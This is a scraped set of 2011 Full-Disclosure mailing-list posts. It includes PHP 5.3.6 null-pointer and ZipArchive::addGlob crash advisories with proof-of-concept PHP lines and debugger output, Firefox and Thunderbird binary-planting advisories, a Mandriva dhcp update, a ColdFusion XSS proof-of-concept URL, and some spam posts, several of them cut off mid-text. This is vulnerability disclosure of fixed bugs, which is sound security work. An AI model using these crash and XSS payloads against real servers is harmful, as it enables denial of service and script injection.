[Full-disclosure] PHP 5.3.6 multiple null pointer dereference
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ PHP 5.3.6 multiple null pointer dereference ]
Author: Maksymilian Arciemowicz
http://securityreason.com/
http://securityreason.net/
http://cxib.net/
Date:
- - Dis.: 20.07.2011
- - Pub.: 19.08.2011
Affected Software (verified):
PHP 5.3.6 and prior
Fixed:
PHP 5.3.7
Original URL:
http://securityreason.com/achievement_securityalert/101
- --- 0.Description ---
PHP is a general-purpose scripting language originally designed for web
development to produce dynamic web pages. For this purpose, PHP code is
embedded into the HTML source document and interpreted by a web server
with a PHP processor module, which generates the web page document. It
also has evolved to include a command-line interface capability and can
be used in standalone graphical applications.
- --- 1. PHP 5.3.6 multiple null pointer dereference ---
Some time ago we have reported list with possible NULL pointer
dereferences in php 5.3.6. If user may change size of malloc, it's
possible to get NULL pointer dereferences. I haven't enought time to
check security impacts for all these bugs.
To demonstrate these flaws, we may use default memory limit in OpenBSD
[512MB]. We should allocate a lot of memory like 510MB (still 2MB free).
If some string is longer than 2MB (example 4MB), and php try copy this
string using malloc/strlen etc then malloc return NULL. Then program is
counting with possible NULL pointer dereference or buffer overflow
sympthons.
Example:
http://cwe.mitre.org/data/definitions/690.html
where CWE-690 give CWE-476 NULL pointer dereference
good example for CWE-690 is
tz->location.comments = malloc(comments_len + 1);
memcpy(tz->location.comments, *tzf, comments_len);
This code may provide to null pointer dereference or simple crash with
nulling memory with memset()
in.str = malloc((e - s) + YYMAXFILL);
memset(in.str, 0, (e - s) + YYMAXFILL);
memcpy(in.str, s, (e - s));
Program received signal SIGSEGV, Segmentation fault.
0xbba7581c in memset () from /usr/lib/libc.so.12
(gdb) x/i $eip
0xbba7581c : rep stos %eax,%es:(%edi)
(gdb) x/x $eax
0x0:Cannot access memory at address 0x0
(gdb) x/x $edi
0x0:Cannot access memory at address 0x0
In this case, memset() overwrite the memory with 0x0 char. If attacker
can put something else that 0x0, it would have security impact.
There are more interesting places, where user may try change size of
malloc. See bellow
- -id0-start-
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/curl/interface.c?view=markup
820 if (!CRYPTO_get_id_callback()) {
821 int i, c = CRYPTO_num_locks();
822
823 php_curl_openssl_tsl = malloc(c * sizeof(MUTEX_T));
824
825 for (i = 0; i < c; ++i) {
826 php_curl_openssl_tsl[i] = tsrm_mutex_alloc();
827 }
828
829 CRYPTO_set_id_callback(php_curl_ssl_id);
830 CRYPTO_set_locking_callback(php_curl_ssl_lock);
831 }
- -id0-end-
- -id1-start-
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_date.c?view=markup
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_iso_intervals.c?view=markup
multiple malloc/calloc/realloc
323 uchar *buf = (uchar*) malloc(((s->lim - s->bot) +
BSIZE)*sizeof(uchar));
324 memcpy(buf, s->tok, s->lim - s->tok);
496 str = calloc(1, end - begin + 1);
497 memcpy(str, begin, end - begin);
346 s->errors->warning_messages =
realloc(s->errors->warning_messages, s->errors->warning_count *
sizeof(timelib_error_message));
347 s->errors->warning_messages[s->errors->warning_count -
1].position = s->tok ? s->tok - s->str : 0;
348 s->errors->warning_messages[s->errors->warning_count -
1].character = s->tok ? *s->tok : 0;
349 s->errors->warning_messages[s->errors->warning_count -
1].message = strdup(error);
- -id1-end-
- -id2-start-
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_tz.c?view=markup
210 tz->location.comments = malloc(comments_len + 1);
211 memcpy(tz->location.comments, *tzf, comments_len);
212 tz->location.comments[comments_len] = '\0';
213 *tzf += comments_len;
- -id2-end-
- -id3-start-
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/timelib.c?revision=305315&view=markup
124 tmp->trans = (int32_t *) malloc(tz->timecnt * sizeof(int32_t));
125 tmp->trans_idx = (unsigned char*) malloc(tz->timecnt *
sizeof(unsigned char));
126 memcpy(tmp->trans, tz->trans, tz->timecnt * sizeof(int32_t));
127 memcpy(tmp->trans_idx, tz->trans_idx, tz->timecnt *
sizeof(unsigned char));
128
129 tmp->type = (ttinfo*) malloc(tz->typecnt * sizeof(struct ttinfo));
130 memcpy(tmp->type, tz->type, tz->typecnt * sizeof(struct ttinfo));
131
132 tmp->timez
[Full-disclosure] PHP 5.3.6 ZipArchive invalid use glob(3)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ PHP 5.3.6 ZipArchive invalid use glob(3) ]
Author: Maksymilian Arciemowicz
http://securityreason.com/
http://securityreason.net/
http://cxib.net/
Date:
- - Dis.: 01.04.2011
- - Pub.: 19.08.2011
CVE: CVE-2011-1657
Affected Software (verified):
PHP 5.3.6 and prior
Fixed:
PHP 5.3.7
Original URL:
http://securityreason.com/achievement_securityalert/100
- --- 0.Description ---
PHP is a general-purpose scripting language originally designed for web
development to produce dynamic web pages. For this purpose, PHP code is
embedded into the HTML source document and interpreted by a web server
with a PHP processor module, which generates the web page document. It
also has evolved to include a command-line interface capability and can
be used in standalone graphical applications.
ZipArchive
This extension enables you to transparently read or write ZIP compressed
archives and the files inside them.
- --- 1. PHP 5.3.6 ZipArchive invalid use glob(3) ---
Functions like addGlob and addPattern are not described in
documentation. Anyway we can call to ZipArchive::addGlob and
ZipArchive::addPattern in PHP 5.3.6
http://pl2.php.net/manual/en/class.ziparchive.php
let's see ext/zip/php_zip.c
531 if (0 != (ret = glob(pattern, flags & GLOB_FLAGMASK, NULL,
&globbuf))) {
...
1629/* 1 == glob, 2==pcre */
1630if (type == 1) {
1631if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|la",
1632&pattern, &pattern_len, &flags, &options) == FAILURE) {
1633return;
1634}
1635} else {
1636if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|sa",
1637&pattern, &pattern_len, &path, &path_len, &options) == FAILURE) {
1638return;
1639}
1640}
1641
invalid &flags may provide to crash. To use flags like GLOB_ALTDIRFUNC,
we should first declare gl_opendir, gl_closedir, gl_lstat, gl_stat. In
PHP we only have
508 glob_t globbuf;
...
530 globbuf.gl_offs = 0;
531 if (0 != (ret = glob(pattern, flags & GLOB_FLAGMASK, NULL,
&globbuf))) {
for addglob() there are no GLOB flags validation like in php/glob().
Only flags like
GLOB_MARK|GLOB_NOSORT|GLOB_NOCHECK|GLOB_NOESCAPE|GLOB_BRACE|GLOB_ONLYDIR|GLOB_ERR
should be allowed:
- - GLOB_MARK - Adds a slash to each directory returned
- - GLOB_NOSORT - Return files as they appear in the directory (no sorting)
- - GLOB_NOCHECK - Return the search pattern if no files matching it were
found
- - GLOB_NOESCAPE - Backslashes do not quote metacharacters
- - GLOB_BRACE - Expands {a,b,c} to match 'a', 'b', or 'c'
- - GLOB_ONLYDIR - Return only directory entries which match the pattern
- - GLOB_ERR - Stop on read errors (like unreadable directories), by
default errors are ignored.
- ---linux/ubuntu---
cx@cx64:~$ php -v
PHP 5.3.3-1ubuntu9.3 with Suhosin-Patch (cli) (built: Jan 12 2011 16:07:38)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
cx@cx64:~$ uname -a
Linux cx64 2.6.35-28-generic #49-Ubuntu SMP Tue Mar 1 14:39:03 UTC 2011
x86_64 GNU/Linux
cx@cx64:/www$ cat zip.php
open("empty.zip");$nx->addGlob(str_repeat("*",33),0x39);
?>cx@cx64:/www$ php zip.php
Segmentation fault
- ---linux/ubuntu---
Tested with NetBSD glob(3) implementation (netbsd 5.1 and PHP 5.3.6)
- ---bsd/netbsd---
unlink("empty.zip"); fopen("empty.zip","a"); $nx=new
ZipArchive();$nx->open("empty.zip");$nx->addGlob(str_repeat("A",100),0x39);
Program received signal SIGSEGV, Segmentation fault.
0xbb86bb12 in realloc () from /usr/lib/libc.so.12
(gdb) i r
eax0x410041 4259905
ecx0xc 12
edx0xbfb0 -1078984704
ebx0xbb8c81f4 -1148419596
esp0xbfbfa980 0xbfbfa980
ebp0xbfbfa9d8 0xbfbfa9d8
esi0xfc000 1032192
edi0x0 0
eip0xbb86bb12 0xbb86bb12
(gdb) x/i $eip
0xbb86bb12 : mov0x8(%eax),%edi
(gdb) x/i $eax
0x410041: Cannot access memory at address 0x410041
- ---bsd/netbsd---
and now try 'B'
- ---bsd/netbsd---
unlink("empty.zip");
fopen("empty.zip","a");
$nx=new
ZipArchive();$nx->open("empty.zip");$nx->addGlob(str_repeat("B",100),0x39);
(gdb) x/i $eip
0xbb86bb12 : mov0x8(%eax),%edi
(gdb) x/i $eax
0x420042: Cannot access memory at address 0x420042
- ---bsd/netbsd---
A we get mov0x8(%eax),%edi where eax=0x410041
B we get mov0x8(%eax),%edi where eax=0x420042
and once again for eax=0x0
- ---bsd/netbsd---
$nx=new ZipArchive();$nx->open("empty.zip");$nx->addGlob("aa",0x39);
Program received signal SIGSEGV, Segmentation fault.
0xbb8e2960 in pthread_mutex_lock () from /usr/lib/libpthread.so.0
(gdb) bt
#0 0xbb8e2960 in pthread_mutex_lock () from /usr/lib/libpthread.so.0
#1 0xbb86a43a in _malloc_prefork () from /usr/lib/libc.so.12
#2 0xbb86bb9c in realloc () from /usr/lib/libc.so.12
#3 0xbb83610b in __globfree30 () from /usr/lib/libc.so.12
#4 0xbb836cb7 in __globfree30 () from /usr/
[Full-disclosure] ?
sabu??? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ASPR #2011-08-18-1: Remote Binary Planting in Mozilla Firefox
=[BEGIN-ACROS-REPORT]= PUBLIC = ACROS Security Problem Report #2011-08-18-1 - ASPR #2011-08-18-1: Remote Binary Planting in Mozilla Firefox = Document ID: ASPR #2011-08-18-1-PUB Vendor: Mozilla (http://www.mozilla.org) Target: Mozilla Firefox Impact: Remote execution of arbitrary code Severity:Very high Status: Official fix available, workarounds available Discovered by: Jure Skofic of ACROS Security CVSS score: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C) CVE ID: CVE-2011-2980 CWE ID: CWE-426: Untrusted Search Path Current version http://www.acrossecurity.com/aspr/ASPR-2011-08-18-1-PUB.txt Summary === A "binary planting" [1] vulnerability in Mozilla Firefox allows local or remote (even Internet-based) attackers to deploy and execute malicious code on Windows machines in the context of logged-on users. Product Coverage - Mozilla Firefox 3.6.19 and earlier versions for Windows Analysis As a result of an incorrect dynamic link library loading in Mozilla Firefox for Windows, an attacker can cause her malicious DLL to be loaded and executed from local drives, remote Windows shares, and even shares located on Internet. All a remote attacker has to do is plant a malicious DLL with a specific name on a network share and get the user to open a specially crafted HTML file from this network location - which should require minimal social engineering. Since Windows systems by default have the Web Client service running - which makes remote network shares accessible via WebDAV -, the malicious DLL can also be deployed from an Internet-based network share as long as the intermediate firewalls allow outbound HTTP traffic to the Internet. A systematic attack could deploy malicious code to a large number of Windows workstations in a short period of time, possibly as an Internet worm. Visit http://www.binaryplanting.com/ for more information on binary planting vulnerabilities and attacks. Additional details are available to interested corporate and government customers under NDA, as public disclosure would reveal too many details on the vulnerability and unduly accelerate malicious exploitation. Mitigating Factors == - A firewall blocking outbound WebDAV traffic (in addition to blocking all Windows Networking protocols) could stop an Internet-based attack. - Microsoft's CWDIllegalInDllSearch hotfix [2] can stop a network-based exploitation of this vulnerability. Solution Mozilla has issued a security bulletin [3] and published a remediated version of Firefox that fixes this issue. Workaround == - Stopping the Web Client service could stop Internet-based attacks as long as the network firewall stops outbound Microsoft Networking protocols. This would not, however, stop remote LAN-based attacks where the attacker is able to place a malicious DLL on a network share inside the target (e.g., corporate) network. - General recommendations for limiting or stopping binary planting attacks are available at http://www.binaryplanting.com/guidelinesAdministrators.htm Related Services ACROS is offering professional consulting on this issue to interested corporate and government customers. Typical questions we can help you answer are: 1) To what extent is your organization affected by this issue? 2) Is it possible to get remote code from the Internet launched inside your network? Can this be demonstrated? 3) Have you adequately applied the remedies to remove the vulnerability? 4) Are there circumstances in your environment that might prevent the effectiveness of this fix? 5) Are there other workarounds that you could implement to fix this issue more efficiently and/or inexpensively? 6) Are your systems or applications vulnerable to other similar issues? Interested parties are encouraged to ask for more information at secur...@acrossecurity.com. Background == ACROS Security has performed an extensive Binary Planting research project, focused on various types of vulnerabilities where an attacker with low privileges can place (i.e., "plant") a malicious executable file (i.e., "binary") to some possibly remote location and get it launched by some vulnerable application running on user's computer. The research found that binary planting vulnerabilities are affecting a large percentage of Windows applications and often allowing for trivial exploitation: it identified ~520 remotely exploitable bugs in ~200 widely- used Windows applications. A large majority of these vulnerabilties remain unfixed and publicly unknown at the time of this writing. Find o
[Full-disclosure] ASPR #2011-08-18-2: Remote Binary Planting in Mozilla Thunderbird
=[BEGIN-ACROS-REPORT]= PUBLIC = ACROS Security Problem Report #2011-08-18-2 - ASPR #2011-08-18-2: Remote Binary Planting in Mozilla Thunderbird = Document ID: ASPR #2011-08-18-2-PUB Vendor: Mozilla (http://www.mozilla.org) Target: Mozilla Thunderbird Impact: Remote execution of arbitrary code Severity:Very high Status: Official fix available, workarounds available Discovered by: Jure Skofic of ACROS Security CVSS score: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C) CVE ID: CVE-2011-2980 CWE ID: CWE-426: Untrusted Search Path Current version http://www.acrossecurity.com/aspr/ASPR-2011-08-18-2-PUB.txt Summary === A "binary planting" [1] vulnerability in Mozilla Thunderbird allows local or remote (even Internet-based) attackers to deploy and execute malicious code on Windows machines in the context of logged-on users. Product Coverage - Mozilla Thunderbird 3.1.11 and earlier versions for Windows Analysis As a result of an incorrect dynamic link library loading in Mozilla Thunderbird for Windows, an attacker can cause her malicious DLL to be loaded and executed from local drives, remote Windows shares, and even shares located on Internet. All a remote attacker has to do is plant a malicious DLL with a specific name on a network share and get the user to open a specially crafted file from this network location - which should require minimal social engineering. Since Windows systems by default have the Web Client service running - which makes remote network shares accessible via WebDAV -, the malicious DLL can also be deployed from an Internet-based network share as long as the intermediate firewalls allow outbound HTTP traffic to the Internet. A systematic attack could deploy malicious code to a large number of Windows workstations in a short period of time, possibly as an Internet worm. Visit http://www.binaryplanting.com/ for more information on binary planting vulnerabilities and attacks. Additional details are available to interested corporate and government customers under NDA, as public disclosure would reveal too many details on the vulnerability and unduly accelerate malicious exploitation. Mitigating Factors == - A firewall blocking outbound WebDAV traffic (in addition to blocking all Windows Networking protocols) could stop an Internet-based attack. - Microsoft's CWDIllegalInDllSearch hotfix [2] can stop a network-based exploitation of this vulnerability. Solution Mozilla has issued a security bulletin [3] and published a remediated version of Thunderbird that fixes this issue. Workaround == - Stopping the Web Client service could stop Internet-based attacks as long as the network firewall stops outbound Microsoft Networking protocols. This would not, however, stop remote LAN-based attacks where the attacker is able to place a malicious DLL on a network share inside the target (e.g., corporate) network. - General recommendations for limiting or stopping binary planting attacks are available at http://www.binaryplanting.com/guidelinesAdministrators.htm Related Services ACROS is offering professional consulting on this issue to interested corporate and government customers. Typical questions we can help you answer are: 1) To what extent is your organization affected by this issue? 2) Is it possible to get remote code from the Internet launched inside your network? Can this be demonstrated? 3) Have you adequately applied the remedies to remove the vulnerability? 4) Are there circumstances in your environment that might prevent the effectiveness of this fix? 5) Are there other workarounds that you could implement to fix this issue more efficiently and/or inexpensively? 6) Are your systems or applications vulnerable to other similar issues? Interested parties are encouraged to ask for more information at secur...@acrossecurity.com. Background == ACROS Security has performed an extensive Binary Planting research project, focused on various types of vulnerabilities where an attacker with low privileges can place (i.e., "plant") a malicious executable file (i.e., "binary") to some possibly remote location and get it launched by some vulnerable application running on user's computer. The research found that binary planting vulnerabilities are affecting a large percentage of Windows applications and often allowing for trivial exploitation: it identified ~520 remotely exploitable bugs in ~200 widely- used Windows applications. A large majority of these vulnerabilties remain unfixed and publicly unknown at the time of t
[Full-disclosure] [ MDVSA-2011:128 ] dhcp
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:128 http://www.mandriva.com/security/ ___ Package : dhcp Date: August 18, 2011 Affected: 2009.0, 2010.1, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities has been discovered and corrected in dhcp: The server in ISC DHCP 3.x and 4.x before 4.2.2, 3.1-ESV before 3.1-ESV-R3, and 4.1-ESV before 4.1-ESV-R3 allows remote attackers to cause a denial of service (daemon exit) via a crafted DHCP packet (CVE-2011-2748). The server in ISC DHCP 3.x and 4.x before 4.2.2, 3.1-ESV before 3.1-ESV-R3, and 4.1-ESV before 4.1-ESV-R3 allows remote attackers to cause a denial of service (daemon exit) via a crafted BOOTP packet (CVE-2011-2749). Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490 The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2748 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2749 ___ Updated Packages: Mandriva Linux 2009.0: dda862ad08cb6af3d2c56f00caec8c77 2009.0/i586/dhcp-client-4.1.2-0.5mdv2009.0.i586.rpm 74a12d5a8bb25e3dc7b05e414a266721 2009.0/i586/dhcp-common-4.1.2-0.5mdv2009.0.i586.rpm da73a63834a47bf8dffeb723a096ad87 2009.0/i586/dhcp-devel-4.1.2-0.5mdv2009.0.i586.rpm b8f966492c0768a5b07b9f7d4f3b776e 2009.0/i586/dhcp-doc-4.1.2-0.5mdv2009.0.i586.rpm 5193c66ea505dd58af855fab116c9d3e 2009.0/i586/dhcp-relay-4.1.2-0.5mdv2009.0.i586.rpm 5446bf09ef2d59e8f1fa17f49aea33b0 2009.0/i586/dhcp-server-4.1.2-0.5mdv2009.0.i586.rpm 1e32ea7b2d129fce3902f8d7d3fc7198 2009.0/SRPMS/dhcp-4.1.2-0.5mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: eda9fbd8b6bee2648b34b5f2b6458c1c 2009.0/x86_64/dhcp-client-4.1.2-0.5mdv2009.0.x86_64.rpm df4862238668c0077b98b2b03173ccba 2009.0/x86_64/dhcp-common-4.1.2-0.5mdv2009.0.x86_64.rpm 901134adffc97d090eb365d0b5e799a3 2009.0/x86_64/dhcp-devel-4.1.2-0.5mdv2009.0.x86_64.rpm 9598ee3d8f8ca49e8a8aeef9e8f943ac 2009.0/x86_64/dhcp-doc-4.1.2-0.5mdv2009.0.x86_64.rpm bb8326601929f31c65dcbaaf0ca0946c 2009.0/x86_64/dhcp-relay-4.1.2-0.5mdv2009.0.x86_64.rpm 7733076ab3269f345b28182a183052f9 2009.0/x86_64/dhcp-server-4.1.2-0.5mdv2009.0.x86_64.rpm 1e32ea7b2d129fce3902f8d7d3fc7198 2009.0/SRPMS/dhcp-4.1.2-0.5mdv2009.0.src.rpm Mandriva Linux 2010.1: 6e2ddb421bf4626a15a52dfb0521b37c 2010.1/i586/dhcp-client-4.1.2-0.5mdv2010.2.i586.rpm 76211a724db2990e07856a9bd6dcbaea 2010.1/i586/dhcp-common-4.1.2-0.5mdv2010.2.i586.rpm 260b5ddff40f7be3bbdda4c00d658a46 2010.1/i586/dhcp-devel-4.1.2-0.5mdv2010.2.i586.rpm 63042fe8a76cc5ec84079803bed66d5f 2010.1/i586/dhcp-doc-4.1.2-0.5mdv2010.2.i586.rpm 99d648dcb18a0d1727d997fe8f2fed7e 2010.1/i586/dhcp-relay-4.1.2-0.5mdv2010.2.i586.rpm de21e38b29447cbac0d5414be9fa784c 2010.1/i586/dhcp-server-4.1.2-0.5mdv2010.2.i586.rpm 41c369066c2bfedc5be7b163e0e6b690 2010.1/SRPMS/dhcp-4.1.2-0.5mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: f963b8fff5d6632c70630da8ed2570dc 2010.1/x86_64/dhcp-client-4.1.2-0.5mdv2010.2.x86_64.rpm dad1f03e73457cead695da4e865b039b 2010.1/x86_64/dhcp-common-4.1.2-0.5mdv2010.2.x86_64.rpm 7f9ffea345996ce41204c8f38470f0b3 2010.1/x86_64/dhcp-devel-4.1.2-0.5mdv2010.2.x86_64.rpm 80a5f8a1104dc51fd85325b149320958 2010.1/x86_64/dhcp-doc-4.1.2-0.5mdv2010.2.x86_64.rpm 459759b5aaa4fa905f2066317b1c25a9 2010.1/x86_64/dhcp-relay-4.1.2-0.5mdv2010.2.x86_64.rpm 78a70cc56c46e6891e1d650231424684 2010.1/x86_64/dhcp-server-4.1.2-0.5mdv2010.2.x86_64.rpm 41c369066c2bfedc5be7b163e0e6b690 2010.1/SRPMS/dhcp-4.1.2-0.5mdv2010.2.src.rpm Corporate 4.0: 363495c22840f39f7f002b4c38cbd174 corporate/4.0/i586/dhcp-client-4.1.2-0.5.20060mlcs4.i586.rpm a1cb7ec82ea1729e28485cfca956b5ba corporate/4.0/i586/dhcp-common-4.1.2-0.5.20060mlcs4.i586.rpm e5316e5ed2ba9c5e76f8deff847a9ce2 corporate/4.0/i586/dhcp-devel-4.1.2-0.5.20060mlcs4.i586.rpm ced770e7a2ae540efe90e151a84fa008 corporate/4.0/i586/dhcp-doc-4.1.2-0.5.20060mlcs4.i586.rpm f78e1cabac3c9ace1228adc169b3d3d7 corporate/4.0/i586/dhcp-relay-4.1.2-0.5.20060mlcs4.i586.rpm 1a4993e7c92a949c81f73462486e074e corporate/4.0/i586/dhcp-server-4.1.2-0.5.20060mlcs4.i586.rpm 69dfd1ea276880ae59f7aa1028843792 corporate/4.0/SRPMS/dhcp-4.1.2-0.5.20060mlcs4.src.rpm Corporate 4.0/X86_64: ccdd99dfef9bfdb5c05df35d8661fd5c corporate/4.0/x86_64/dhcp-client-4.1.2-0.5.20060mlcs4.x86_64.rpm 681b2bcaba8b65e4225f720b3b399e56
Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x10
Hi Moron. Nobody cares about your silly shoops, get a life and stop spamming. On 17 August 2011 21:03, Herr E Balls wrote: > Hi guys and welcome to day 17 of MOHSEP. > > here is today's link: > http://mohsepblog.blogspot.com/2011/08/wednesday-august-17th-2011.html > > Until tomorrow :D :D > > Herr E Balls > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ColdFusion Local Parameter Xss Exploit
*Describe:*ColdFusion probe.cfm page local parameter can xss
*CVE:*Unknow
*PoC:*
http://127.0.0.1/CFIDE/probe.cfm?name=alert("G.R0b1n")
URL.Name parameter can xss only local.
Or visit:
http://www.focusecurity.org/2011/08/ColdFusion-Local-Parameter-Xss-Exploit.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x10
Hi guys and welcome to day 17 of MOHSEP. here is today's link: http://mohsepblog.blogspot.com/2011/08/wednesday-august-17th-2011.html Until tomorrow :D :D Herr E Balls ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
